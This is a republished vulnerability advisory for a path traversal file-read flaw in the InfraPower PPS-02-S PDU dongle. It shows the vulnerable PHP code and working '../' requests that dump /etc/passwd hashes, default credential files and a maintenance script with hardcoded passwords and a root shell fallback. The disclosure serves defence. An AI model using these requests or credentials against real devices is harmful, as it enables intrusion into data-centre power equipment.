what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

InfraPower PPS-02-S Q213V1 Local File Disclosure

InfraPower PPS-02-S Q213V1 Local File Disclosure
Posted Oct 30, 2016
Authored by LiquidWorm | Site zeroscience.mk

InfraPower PPS-02-S Q213V1 suffers from a file disclosure vulnerability when input passed thru the 'file' parameter to 'ListFile.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.

tags | exploit, local, php
SHA-256 | ad79cf9d2792971f12b4467e9bfe8405b2023253e269e5156772d5997b5f9649

InfraPower PPS-02-S Q213V1 Local File Disclosure

Change Mirror Download

InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability


Vendor: Austin Hughes Electronics Ltd.
Product web page: https://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: InfraPower suffers from a file disclosure vulnerability when
input passed thru the 'file' parameter to 'ListFile.php' script is
not properly verified before being used to read files. This can
be exploited to disclose contents of files from local resources.

-------------------------------------------------------------------
ListFile.php:
-------------

8: if(isset($_GET['file'])){
9: $handle = $_GET['file'];
10: $fp = fopen('/ramdisk/'.$handle, 'r');
11: while(!feof($fp)){
12: $tmp=fgets($fp,2000);
13: $tmp = str_replace("\n","<br />",$tmp);
14: echo $tmp;
15: }
16: fclose($fp);
17: }

-------------------------------------------------------------------


Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5370
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php


27.09.2016

--


https://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd

root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh


https://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf

LoginAuth 1
UserName 00000000
Password 00000000


https://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf

dmin 999999
manager 666666
user 111111


https://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh

#!/bin/sh
echo -n "Please enter maintenance password:"
read -s pass
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
if [ "$InfraType" == "1" ]; then
if [ "$pass" != "InfraSolution" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "2" ]; then
if [ "$pass" != "InfraGuard" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "3" ]; then
if [ "$pass" != "InfraPower" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "4" ]; then
if [ "$pass" != "InfraCool" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
#---emergency recovery mode
echo "DEBUG su mode started!"
su
fi
fi
fi
fi

# create menu
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
while true; do
echo -n "Input Maintenance menu item number(? for help):"
read y
case $y in
"?")
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
;;
"1")
echo "****/mnt/mtd/main_conf******************************"
vi /mnt/mtd/main_conf
echo "****************************************************"
;;
"2")
echo "****/mnt/mtd/snmp_conf******************************"
cat /mnt/mtd/snmp_conf
echo "****************************************************"
;;
"3")
echo "****/mnt/mtd/net_conf*******************************"
cat /mnt/mtd/net_conf
echo "****************************************************"
;;
"4")
echo "****/mnt/mtd/web_conf*******************************"
cat /mnt/mtd/web_conf
echo "****************************************************"
;;
"5")
echo "(5) Enable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans5
if [ "$ans5" == "y" ]; then
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
echo -n "Patching boot.sh ..."
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
chmod 777 /mnt/mtd/boot.sh
if [ -f "/mnt/mtd/boot.sh" ]; then
echo "...done"
else
echo "...fail"
fi
else
echo "file not exist: /mnt/mtd/patch/boot.sh"
fi
fi
;;
"6")
echo "(6) Disable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans6
if [ "$ans6" == "y" ]; then
if [ -f "/mnt/mtd/boot.sh" ]; then
echo -n "Disabling boot.sh pacthing..."
rm /mnt/mtd/boot.sh
echo "...done"
else
echo "File not exist: /mnt/mtd/boot.sh"
fi
fi
;;
"7")
echo "(7) Clear /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans7
if [ "$ans7" == "y" ]; then
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
rm -r /mnt/mtd/patch/*
if [ ! -f "/mnt/mtd/patch/" ]; then
echo "...done"
echo -n "Reboot to apply changes? [y/n]:"
read ans7r
if [ "$ans7r" == "y" ]; then
echo "Rebooting..."
reboot
fi

else
echo "...fail"
fi
fi
;;
"8")
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/patch_now.sh" ]; then
chmod 777 /www/patch/patch_now.sh
sh /www/patch/patch_now.sh
else
echo "file not exist: /www/patch/patch_now.sh"
fi
fi
;;
"9")
echo "****Process List*******************************"
ps
echo "***********************************************"
;;
"A")
echo "(A) Patch SNMP "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/snmplink.sh" ]; then
sh /www/patch/snmplink.sh
if [ -f "/www/snmplink.log" ]; then
cat /www/snmplink.log
fi
echo "Patching SNMP and its modules...done"
else
echo "file not exist: /www/patch/snmplink.sh"
fi
fi
;;
"B")
echo "(B) Restore Box Configuration(box_conf) "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/etc/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf..."
cp /etc/box_conf /mnt/mtd/box_conf
if [ -f "/mnt/mtd/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf...done"
else
echo "Patching /mnt/mtd/box_conf...failed"
fi
else
echo "file not exist: /etc/box_conf"
fi
fi
;;
"P")
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
echo "(P) Restore INI, POL profiles for $INFRA_VER "
echo -n "Are you sure to continue? [y/n]:"
read ansP
if [ "$ansP" == "y" ]; then
if [ "$InfraType" == "1" ]; then
echo "Restoring INI, POL profiles for $INFRA_VER..."
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
echo "...done"
fi
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
echo "...done"
fi
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
echo "...done"
fi
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
echo "...done"
fi
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
echo "...done"
fi
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
echo "...done"
fi
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
echo "...done"
fi
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
echo "...done"
fi
fi
fi
;;
"E")
echo -n "Input command line:"
read cmd_line
$cmd_line
;;
"M")
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
cat /mnt/mtd/log_memCheck.txt
fi
;;
"R")
echo "(R) Reboot "
echo -n "Are you sure to continue? [y/n]:"
read ansR
if [ "$ansR" == "y" ]; then
echo "Rebooting..."
reboot
fi
;;
"X")
echo "su mode started!"
su
;;
"Q")
echo "Leaving maintenance mode........OK"
exit 0
;;
esac
done
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close